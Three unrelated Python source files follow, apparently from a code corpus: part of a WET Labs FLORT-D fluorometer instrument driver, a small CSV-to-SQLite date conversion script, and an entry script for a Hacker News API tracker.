next_state = DriverProtocolState.COMMAND
response = []
sample = DataParticleType.FLORDD_SAMPLE
if self.__instrument_class__ == FLORT_CLASS:
sample = DataParticleType.FLORTD_SAMPLE
particles = self.wait_for_particles([sample], timeout=time.time()+DISCOVER_TIMEOUT)
if particles:
next_state = DriverProtocolState.AUTOSAMPLE
return next_state, (next_state, response)
########################################################################
# Command handlers.
########################################################################
def _handler_command_enter(self, *args, **kwargs):
"""
Enter command state. Update the param dictionary.
@throws InstrumentTimeoutException if the device cannot be woken.
@throws InstrumentProtocolException if the update commands are not recognized.
"""
if self._init_type != InitializationType.NONE:
response = self._do_cmd_resp(InstrumentCommand.PRINT_MENU, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
self._param_dict.update(response)
response = self._do_cmd_resp(InstrumentCommand.PRINT_METADATA, timeout=TIMEOUT,
response_regex=MET_REGEX_MATCHER)
self._param_dict.update(response)
self._init_params()
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
def _handler_command_get(self, *args, **kwargs):
"""
Get commands
"""
next_state, result = self._handler_get(*args, **kwargs)
# TODO match the return signature of other handlers - next_state, (next_state, result)
return next_state, result
def _handler_command_set(self, *args, **kwargs):
"""
Set commands
"""
next_state = None
result = []
try:
params = args[0]
log.debug('Params = %s', params)
except IndexError:
raise InstrumentParameterException('_handler_command_set Set command requires a parameter dict.')
try:
startup = args[1]
except IndexError:
startup = False
log.debug("NO STARTUP VALUE")
pass
if not isinstance(params, dict):
raise InstrumentParameterException('Set parameters not a dict.')
# For each key, val in the dict, issue set command to device.
# Raise if the command not understood.
else:
self._set_params(params, startup)
return next_state, result
@staticmethod
def _handler_command_exit(*args, **kwargs):
"""
Exit command state.
"""
pass
def _handler_command_acquire_sample(self, *args, **kwargs):
"""
Get one sample from the instrument
"""
next_state = None
timeout = time.time() + SAMPLE_TIMEOUT
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, *args, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
if self.__instrument_class__ == FLORT_CLASS:
sample_particle_class = DataParticleType.FLORTD_SAMPLE
else:
sample_particle_class = DataParticleType.FLORDD_SAMPLE
particles = self.wait_for_particles([sample_particle_class], timeout)
return next_state, (next_state, particles)
def _handler_command_start_autosample(self, *args, **kwargs):
"""
Switch into autosample mode. ($run)
"""
next_state = ProtocolState.AUTOSAMPLE
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
result = self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
return next_state, (next_state, [result])
def _handler_command_acquire_status(self, *args, **kwargs):
"""
Run the $mnu Command (print menu)
"""
next_state = None
timeout = time.time() + STATUS_TIMEOUT
self._do_cmd_resp(InstrumentCommand.PRINT_MENU, timeout=TIMEOUT, response_regex=MNU_REGEX_MATCHER)
if self.__instrument_class__ == FLORT_CLASS:
status_particle_class = DataParticleType.FLORTD_MNU
else:
status_particle_class = DataParticleType.FLORDD_MNU
particles = self.wait_for_particles([status_particle_class], timeout)
return next_state, (next_state, particles)
def _handler_command_run_wiper(self, *args, **kwargs):
"""
Issue the run wiper command ($mvs)
"""
next_state = None
result = self._do_cmd_resp(InstrumentCommand.RUN_WIPER, *args, timeout=TIMEOUT,
response_regex=RUN_REGEX_MATCHER)
return next_state, (next_state, [result])
def _handler_command_clock_sync(self, *args, **kwargs):
"""
Synchronize the clock
"""
next_state = None
result = []
self._sync_clock()
return next_state, (next_state, result)
########################################################################
# Autosample handlers.
########################################################################
def stop_scheduled_job(self, schedule_job):
"""
Remove the scheduled job
:param schedule_job:
"""
if self._scheduler is not None:
try:
self._remove_scheduler(schedule_job)
except KeyError:
log.debug("_remove_scheduler could not find %s", schedule_job)
def start_scheduled_job(self, param, schedule_job, protocol_event):
"""
Add a scheduled job
:param param:
:param schedule_job:
:param protocol_event:
"""
interval = self._param_dict.get(param).split(':')
hours = interval[0]
minutes = interval[1]
seconds = interval[2]
log.debug("Setting scheduled interval to: %s %s %s", hours, minutes, seconds)
config = {DriverConfigKey.SCHEDULER: {
schedule_job: {
DriverSchedulerConfigKey.TRIGGER: {
DriverSchedulerConfigKey.TRIGGER_TYPE: TriggerType.INTERVAL,
DriverSchedulerConfigKey.HOURS: int(hours),
DriverSchedulerConfigKey.MINUTES: int(minutes),
DriverSchedulerConfigKey.SECONDS: int(seconds)
}
}
}
}
self.set_init_params(config)
self._add_scheduler_event(schedule_job, protocol_event)
def _handler_autosample_enter(self, *args, **kwargs):
"""
Enter autosample state. configure and start the scheduled run wiper
@throws InstrumentTimeoutException if the device cannot be woken.
@throws InstrumentProtocolException if the update commands are not recognized.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, *args, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
if self._init_type != InitializationType.NONE:
response = self._do_cmd_resp(InstrumentCommand.PRINT_MENU, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
self._param_dict.update(response)
# get the metadata once from the instrument
response = self._do_cmd_resp(InstrumentCommand.PRINT_METADATA, timeout=TIMEOUT,
response_regex=MET_REGEX_MATCHER)
self._param_dict.update(response)
self._init_params()
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, *args, timeout=TIMEOUT,
response_regex=resp_regex)
# Start scheduling for running the wiper and syncing the clock
log.debug("Configuring the scheduler to run wiper %s", self._param_dict.get(Parameter.RUN_WIPER_INTERVAL))
if self._param_dict.get(Parameter.RUN_WIPER_INTERVAL) != '00:00:00':
self.start_scheduled_job(Parameter.RUN_WIPER_INTERVAL, ScheduledJob.RUN_WIPER,
ProtocolEvent.RUN_WIPER_SCHEDULED)
log.debug("Configuring the scheduler to sync clock %s", self._param_dict.get(Parameter.RUN_CLOCK_SYNC_INTERVAL))
if self._param_dict.get(Parameter.RUN_CLOCK_SYNC_INTERVAL) != '00:00:00':
self.start_scheduled_job(Parameter.RUN_CLOCK_SYNC_INTERVAL, ScheduledJob.CLOCK_SYNC,
ProtocolEvent.SCHEDULED_CLOCK_SYNC)
log.debug("Configuring the scheduler to acquire status %s", self._param_dict.get(
Parameter.RUN_ACQUIRE_STATUS_INTERVAL))
if self._param_dict.get(Parameter.RUN_ACQUIRE_STATUS_INTERVAL) != '00:00:00':
self.start_scheduled_job(Parameter.RUN_ACQUIRE_STATUS_INTERVAL, ScheduledJob.ACQUIRE_STATUS,
ProtocolEvent.SCHEDULED_ACQUIRE_STATUS)
def _handler_autosample_stop_autosample(self, *args, **kwargs):
"""
Stop autosample and switch back to command mode.
@retval (next_state, result) tuple, (ProtocolState.COMMAND, None) if successful.
@throws InstrumentTimeoutException if device cannot be woken for command.
@throws InstrumentProtocolException if command misunderstood or incorrect prompt received.
"""
next_state = ProtocolState.COMMAND
# Stop scheduled run of wiper, clock sync, & acquire status
self.stop_scheduled_job(ScheduledJob.RUN_WIPER)
self.stop_scheduled_job(ScheduledJob.CLOCK_SYNC)
self.stop_scheduled_job(ScheduledJob.ACQUIRE_STATUS)
# Issue the stop command.
result = self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, *args, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
return next_state, (next_state, [result])
def _handler_autosample_run_wiper(self, *args, **kwargs):
"""
Runs the wiper. Puts the instrument into command mode, sends the command. If wiper is run successfully,
put instrument back into autosample mode.
"""
next_state = None
# put instrument into command mode to send run wiper command ($mvs)
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, *args, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
self._do_cmd_resp(InstrumentCommand.RUN_WIPER, *args, timeout=TIMEOUT, response_regex=RUN_REGEX_MATCHER)
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
result = self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
return next_state, (next_state, [result])
def _handler_autosample_acquire_status(self, *args, **kwargs):
"""
Get one sample from the instrument
"""
next_state = None
timeout = time.time() + STATUS_TIMEOUT
# put instrument into command mode to send command $run to collect status
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, timeout=TIMEOUT, response_regex=MNU_REGEX_MATCHER)
self._do_cmd_no_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=MNU_REGEX_MATCHER)
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
if self.__instrument_class__ == FLORT_CLASS:
status_particle_class = DataParticleType.FLORTD_MNU
else:
status_particle_class = DataParticleType.FLORDD_MNU
particles = self.wait_for_particles([status_particle_class], timeout)
return next_state, (next_state, particles)
def _handler_autosample_clock_sync(self, *args, **kwargs):
"""
Syncs the clock. Puts the instrument in command mode, synchronizes the clock, then puts the instrument
back into autosample mode.
"""
next_state = None
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, timeout=TIMEOUT, response_regex=MNU_REGEX_MATCHER)
self._sync_clock()
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
result = self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
return next_state, (next_state, [result])
@staticmethod
def _handler_autosample_exit(*args, **kwargs):
"""
Exit autosample state.
"""
pass
########################################################################
# Direct access handlers.
########################################################################
def _handler_direct_access_enter(self, *args, **kwargs):
"""
Enter direct access state.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
self._sent_cmds = []
@staticmethod
def _handler_direct_access_exit(*args, **kwargs):
"""
Exit direct access state.
"""
pass
def _handler_direct_access_execute_direct(self, data):
"""
Execute Direct Access command(s)
"""
next_state = None
result = []
self._do_cmd_direct(data)
# add sent command to list for 'echo' filtering in callback
self._sent_cmds.append(data)
return next_state, (next_state, result)
def _handler_direct_access_stop_direct(self):
"""
Stop Direct Access, and put the driver into a healthy state by reverting itself back to the previous
state before starting Direct Access.
@throw InstrumentProtocolException on invalid command
"""
# update current state in case the direct access commands modified it
next_state, (_, result) = self._handler_unknown_discover()
return next_state, (next_state, result)
@staticmethod
def _handler_command_start_direct():
"""
Start direct access
"""
next_state = ProtocolState.DIRECT_ACCESS
result = []
return next_state, (next_state, result)
########################################################################
# Private helpers.
########################################################################
def _set_params(self, *args, **kwargs):
"""
Issue commands to the instrument to set various parameters
Also called when setting parameters during startup and direct access
"""
params = args[0]
self._verify_not_readonly(*args, **kwargs)
old_config = self._param_dict.get_config()
for (key, val) in params.iteritems():
log.debug("KEY = " + str(key) + " VALUE = " + str(val))
# if setting the clock or date, run clock sync command
if key in [Parameter.TIME, Parameter.DATE]:
self._sync_clock()
else:
# verify value being set is different than that stored
old_val = self._param_dict.format(key)
new_val = self._param_dict.format(key, params[key])
log.debug('KEY = %r, old = %r new %r', key, old_val, new_val)
if old_val != new_val:
# if setting the mvs interval/clock sync interval/acquire status interval/ instrument class,
# do not send a command
if key in [Parameter.RUN_WIPER_INTERVAL,
Parameter.RUN_CLOCK_SYNC_INTERVAL,
Parameter.RUN_ACQUIRE_STATUS_INTERVAL]:
self._param_dict.set_value(key, val)
# else perform regular command
else:
response = self._do_cmd_resp(InstrumentCommand.SET, key, val, response_regex=MNU_REGEX_MATCHER)
self._param_dict.update(response)
# Get new param dict config. If it differs from the old config,
# tell driver superclass to publish a config change event.
new_config = self._param_dict.get_config()
if not dict_equal(old_config, new_config, ignore_keys=Parameter.TIME):
self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)
def _build_single_parameter_command(self, cmd, param, val):
"""
Build handler for set commands. param val followed by newline.
String val constructed by param dict formatting function.
@param param the parameter key to set.
@param val the parameter value to set.
@retval The set command to be sent to the device.
@throws InstrumentProtocolException if the parameter is not valid or if the formatting function could not
accept the value passed.
"""
try:
str_val = self._param_dict.format(param, val)
if str_val is None:
raise InstrumentParameterException("Driver PARAM was None!!!!")
# do extra formatting if one of these commands
if param == 'clk':
str_val = str_val.replace(":", "")
if param == 'dat':
str_val = str_val.replace("/", "")
set_cmd = '%s %s' % (param, str_val)
set_cmd += NEWLINE
set_cmd = '$' + set_cmd
except KeyError:
raise InstrumentParameterException('Unknown driver parameter %s' % param)
return set_cmd
@staticmethod
def _build_no_eol_command(cmd):
"""
Build handler for commands issued without eol. Primarily for the instrument interrupt command.
"""
return cmd
def _build_simple_command(self, cmd, *args):
"""
Build handler for basic commands.
@param cmd the simple command to format.
@retval The command to be sent to the device.
"""
return cmd + NEWLINE
def _got_chunk(self, chunk, timestamp):
"""
The base class got_data has gotten a chunk from the chunker. Pass it to extract_sample
with the appropriate particle objects and REGEXes.
"""
if self.__instrument_class__ == FLORT_CLASS:
log.trace("_got_chunk - Instrument class == flort")
if self._extract_sample(FlortMenuParticle, MNU_REGEX_MATCHER, chunk, timestamp):
log.trace("_got_chunk - successful match for FlortDMNU_Particle")
elif self._extract_sample(FlortSampleParticle, FLORT_SAMPLE_REGEX_MATCHER, chunk, timestamp):
log.trace("_got_chunk - successful match for FlortDSample_Particle")
else:
log.trace("_got_chunk - _param_dict == %s", str(self._param_dict))
if self._extract_sample(FlordMenuParticle, MNU_REGEX_MATCHER, chunk, timestamp):
log.trace("_got_chunk - successful match for FlordDMNU_Particle")
elif self._extract_sample(FlordSampleParticle, FLORD_SAMPLE_REGEX_MATCHER, chunk, timestamp):
log.trace("_got_chunk - successful match for FlordDSample_Particle")
def _wakeup(self, timeout, delay=1):
"""
Override method: There is no wakeup for this instrument
"""
pass
def _sync_clock(self, time_format="%m%d%y %H:%M:%S"):
"""
Send the command to the instrument to synchronize the clock
@param time_format: time format string for set command
@raise: InstrumentProtocolException if command fails
"""
# clear out any past data so it doesn't confuse the command
self._linebuf = ''
self._promptbuf = ''
str_val = get_timestamp_delayed(time_format).split(" ")
date_val = str_val[0]
clock_val = str_val[1]
log.debug("Setting the clock to %s %s", clock_val, date_val)
self._do_cmd_resp(InstrumentCommand.SET, Parameter.TIME, clock_val, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
self._do_cmd_resp(InstrumentCommand.SET, Parameter.DATE, date_val, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
@staticmethod
def _float_to_string(v):
"""
Override the base class method, which returns an exponentially formatted float; that format is not what is needed here.
Write a float value to string formatted for set operations.
@param v A float val.
@retval a float string formatted for set operations.
@throws InstrumentParameterException if value is not a float.
"""
if not isinstance(v, float):
raise InstrumentParameterException('Value %s is not a float.' % v)
else:
return str(v)
def _int_to_string_inrange(self, v):
"""
Validate that integer is in range (between 1 and 255) before returning the string value
@param v An int value.
@retval a string representing the input (v) parameter
@throws InstrumentParameterException if value is not within the range.
"""
if v < 1 or v > 255:
raise InstrumentParameterException('Value %s must be between 1 and 255' % (v,))
else:
return self._int_to_string(v)
def _build_driver_dict(self):
"""
Populate the driver dictionary with options
"""
self._driver_dict.add(DriverDictKey.VENDOR_SW_COMPATIBLE, True)
def _build_command_dict(self):
"""
Populate the command dictionary with commands
"""
self._cmd_dict.add(Capability.RUN_WIPER, timeout=5, display_name="Run Wiper")
self._cmd_dict.add(Capability.CLOCK_SYNC, timeout=5, display_name='Synchronize Clock')
self._cmd_dict.add(Capability.ACQUIRE_SAMPLE, timeout=SAMPLE_TIMEOUT, display_name='Acquire Sample')
self._cmd_dict.add(Capability.START_AUTOSAMPLE, timeout=5, display_name='Start Autosample')
self._cmd_dict.add(Capability.STOP_AUTOSAMPLE, timeout=5, display_name='Stop Autosample')
self._cmd_dict.add(Capability.ACQUIRE_STATUS, timeout=STATUS_TIMEOUT, display_name='Acquire Status')
self._cmd_dict.add(Capability.DISCOVER, timeout=10, display_name='Discover')
def _build_param_dict(self):
"""
Populate the parameter dictionary with parameters. For each parameter key, add match string, match lambda
function, and value formatting function for set commands.
"""
# StatusData
self._param_dict.add(Parameter.SERIAL_NUM,
FlortMenuParticle.LINE01,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Serial Number",
description='Instrument serial number',
default_value=None,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.FIRMWARE_VERSION,
FlortMenuParticle.LINE02,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Firmware Version",
description='Firmware version',
default_value=None,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENTS_PER_REPORTED,
FlortMenuParticle.LINE03,
lambda match: int(match.group(1)),
self._int_to_string_inrange,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_WRITE,
display_name="Measurements per Reported Value",
description='Number of measurements for each reported value: (1 - 255)',
range=(1, 255),
default_value=1,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.MEASUREMENTS_PER_PACKET,
FlortMenuParticle.LINE04,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Measurements per Packet",
description='Number of individual measurements in each packet. 0 is continuous operation.',
range=(0, 65535),
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.MEASUREMENT_1_DARK_COUNT,
FlortMenuParticle.LINE05,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 1 Dark Count",
description='Dark count value for 700nm scatter: (0 - 65535)',
range=(0, 65535),
default_value=None,
units=ParameterUnit.COUNTS,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_2_DARK_COUNT,
FlortMenuParticle.LINE06,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 2 Dark Count",
description='Dark count value for chlorophyll concentration: (0 - 65535)',
range=(0, 65535),
default_value=None,
units=ParameterUnit.COUNTS,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_3_DARK_COUNT,
FlortMenuParticle.LINE07,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 3 Dark Count",
description='Dark count value for CDOM concentration: (0 - 65535)',
range=(0, 65535),
default_value=None,
units=ParameterUnit.COUNTS,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_1_SLOPE,
FlortMenuParticle.LINE08,
lambda match: float(match.group(1)),
self._float_to_string,
type=ParameterDictType.FLOAT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 1 Slope Value",
description='Scale factor for 700nm scatter.',
default_value=None,
units=ParameterUnit.PART_PER_METER_STERADIAN,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_2_SLOPE,
FlortMenuParticle.LINE09,
lambda match: float(match.group(1)),
self._float_to_string,
type=ParameterDictType.FLOAT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 2 Slope Value",
description='Scale factor for chlorophyll concentration.',
default_value=None,
units=ParameterUnit.MICROGRAMS_PER_LITER,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_3_SLOPE,
FlortMenuParticle.LINE10,
lambda match: float(match.group(1)),
self._float_to_string,
type=ParameterDictType.FLOAT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 3 Slope Value",
description='Scale factor for CDOM concentration.',
default_value=None,
units=ParameterUnit.PARTS_PER_MILLION,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.PREDEFINED_OUTPUT_SEQ,
FlortMenuParticle.LINE11,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Predefined Output Sequence",
description='Indicates which pre-defined output sequences to use when outputting data: (0 - 3)',
range=(0, 3),
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.BAUD_RATE,
FlortMenuParticle.LINE12,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Baud Rate",
description='Baud rate for instrument communications: (2400 to 230400)',
range={'2400': 2400, '4800': 4800, '9600': 9600, '14400': 14400, '19200': 19200,
'19201': 19201, '28800': 28800, '38400': 38400, '57600': 57600, '115200': 115200,
'230400': 230400},
default_value=None,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.PACKETS_PER_SET,
FlortMenuParticle.LINE13,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Packets per Set",
description='Number of packets in a set (0 - 65535). 0 results in the stored configuration repeating continuously.',
range=(0, 65535),
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.RECORDING_MODE,
FlortMenuParticle.LINE14,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Recording Mode",
description='Enables (1) or disables (0) data recording to internal memory.',
range={'Disable': 0, 'Enable': 1},
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.MANUAL_MODE,
FlortMenuParticle.LINE15,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Manual Mode",
description='Enables (1) or disables (0) manual start time.',
range={'Disable': 0, 'Enable': 1},
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.SAMPLING_INTERVAL,
FlortMenuParticle.LINE16,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Time Interval Between Packets",
default_value=None,
description='Time from the start of one packet to the start of the next packet in a set.',
units=ParameterUnit.TIME_INTERVAL,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.DATE,
FlortMenuParticle.LINE17,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Date",
description='Date in the Real Time Clock.',
default_value=None,
units=ParameterUnit.DATE_INTERVAL,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.TIME,
FlortMenuParticle.LINE18,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Time",
description='Time in the Real Time Clock.',
default_value=None,
startup_param=False,
units=ParameterUnit.TIME_INTERVAL,
direct_access=False)
self._param_dict.add(Parameter.MANUAL_START_TIME,
FlortMenuParticle.LINE19,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Manual Start Time",
description="Instrument will wait until this time to start sampling when powered.",
default_value=None,
units=ParameterUnit.TIME_INTERVAL,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.INTERNAL_MEMORY,
FlortMenuParticle.LINE20,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Internal Memory Size",
description='Amount of internal memory.',
range=(0, (1 << 16) - 1),
units=Units.BYTE,
default_value=None,
startup_param=False,
direct_access=False)
########################
# Engineering Parameters
########################
self._param_dict.add(Parameter.RUN_WIPER_INTERVAL,
TIME_INTERVAL,
lambda match: match.group(0),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Run Wiper Interval",
default_value='00:00:00',
description='Time interval for running the wiper command.',
units=ParameterUnit.TIME_INTERVAL,
startup_param=True,
direct_access=False)
self._param_dict.add(Parameter.RUN_CLOCK_SYNC_INTERVAL,
TIME_INTERVAL,
lambda match: match.group(0),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Run Clock Sync Interval",
description='Time interval for running clock sync.',
default_value='00:00:00',
units=ParameterUnit.TIME_INTERVAL,
startup_param=True,
direct_access=False)
self._param_dict.add(Parameter.RUN_ACQUIRE_STATUS_INTERVAL,
TIME_INTERVAL,
lambda match: match.group(0),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Acquire Status Interval",
                             description='Time interval for acquiring status.',
default_value='00:00:00',
units=ParameterUnit.TIME_INTERVAL,
startup_param=True,
direct_access=False)
def create_playback_protocol(callback):
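    """Build a Protocol for playback use, passing only the driver event callback."""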
return Protocol(None, None, callback)
| petercable/mi-instrument | mi/instrument/wetlabs/fluorometer/flort_d/driver.py | Python | bsd-2-clause | 77,155 |
import csv
import os
import sys
import traceback
import sqlite3
import fnmatch
import decimal
import datetime
def valid_dt(dt):
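    """Return True if dt parses as an MM/DD/YYYY date string."""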
try:
datetime.datetime.strptime(dt, "%m/%d/%Y")
return True
    except (ValueError, TypeError):
return False
def adapt_decimal(d):
return str(d)
def convert_decimal(s):
return decimal.Decimal(s)
def db_cur(source = ":memory:"):
# Register the adapter
sqlite3.register_adapter(decimal.Decimal, adapt_decimal)
# Register the converter
sqlite3.register_converter("DECTEXT", convert_decimal)
conn = sqlite3.connect(source, detect_types=sqlite3.PARSE_DECLTYPES)
#conn.row_factory = sqlite3.Row
cur = conn.cursor()
return conn, cur
def question_marks(st):
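    """Return a comma-separated string of '?' placeholders, one per column in the header string st."""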
question_marks = '?'
for i in range(0, len(st.split(','))-1):
question_marks = question_marks + ",?"
return question_marks
def create_tbl(cur, tbl_name, header, arr = [], index_arr = []):
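    """Create table tbl_name from header if it does not exist, create the given indexes and bulk-insert arr if provided."""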
cur.execute("""select count(*) FROM sqlite_master WHERE type='table' AND name = '%s' """ % (tbl_name))
tbl_exists = cur.fetchone()
if tbl_exists[0] == 0:
print "CREATE TABLE " + tbl_name + " (" + header.replace("id,", "id PRIMARY KEY,") + " );"
cur.execute("CREATE TABLE " + tbl_name + " (" + header.replace("id,", "id PRIMARY KEY,") + " );")
for index in index_arr:
cur.execute("CREATE INDEX " + tbl_name + "_" + index + " ON " + tbl_name + " (" + index + ");")
if arr != []:
cur.executemany("INSERT INTO " + tbl_name + " VALUES ("+question_marks(header)+")", arr)
return
def csv_to_arr(csv_file, start=1, has_header=True):
arr = []
with open(csv_file, 'rU') as f:
reader = csv.reader(f)
arr = list(reader)
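    # Transpose to columns, convert any MM/DD/YYYY values to YYYY-MM-DD,
    # drop all-empty columns, then transpose back to rows.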
arr = zip(*arr)
arr = [[(datetime.datetime.strptime(y, "%m/%d/%Y").date().strftime("%Y-%m-%d") if valid_dt(y) else y) for y in x] for x in arr if any(x)]
arr = zip(*arr)
header = ""
if has_header:
header = ','.join(arr[0])
arr = arr[start:]
return header, arr
else:
return arr[start:]
def arr_to_csv(file_name, header, data_arr):
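    """Write header and the rows in data_arr to file_name as a fully quoted CSV."""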
csv_file = open(file_name, 'wb')
wr = csv.writer(csv_file, quoting=csv.QUOTE_ALL)
wr.writerow(header.split(','))
for data_row in data_arr:
line = []
for ele in data_row:
line.append(str(ele))
wr.writerow(line)
csv_file.close()
return
conn, cur = db_cur()
header, arr = csv_to_arr("tmp\\20160914.csv")
print arr[0]
| frederick623/wat | date_transform.py | Python | apache-2.0 | 2,296 |
import argparse
import logging
import helper
import puller
import saver
def run_api(caller, saver):
    """Build the API call, pull the stories and hand them to the saver."""
    url = caller.construct_call()
    stories = process_call(url)  # expected to fetch and parse the stories for url
    saver.save_csv(stories)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose',
help='increase logging verbosity',
action='store_true')
parser.add_argument('-c', '--conf', type=str,
help='configuration file for saver and api calls')
parser.add_argument('-l', '--log', type=str,
help='path for program log')
args = parser.parse_args()
# setting log level
if args.verbose:
log_level = logging.DEBUG
else:
log_level = logging.INFO
# setting log location
if args.log is not None:
logfile = args.log
else:
logfile = './hntracker.log'
# setting up log
logging.basicConfig(filename=logfile, level=log_level,
format='%(asctime)s %(message)s')
logger = logging.getLogger(__name__)
# checking if conf is present
if args.conf is None:
        helper.fatal('no configuration file set', logger)
api_caller = puller.HNCaller(args.conf, logger)
csv_saver = saver.HNSaver(args.conf, logger)
logger.info('beginning api call run')
run_api(api_caller, csv_saver)
logger.info('completed api call run')
# cleaning up log
logger.debug('closing log')
    logging.shutdown()
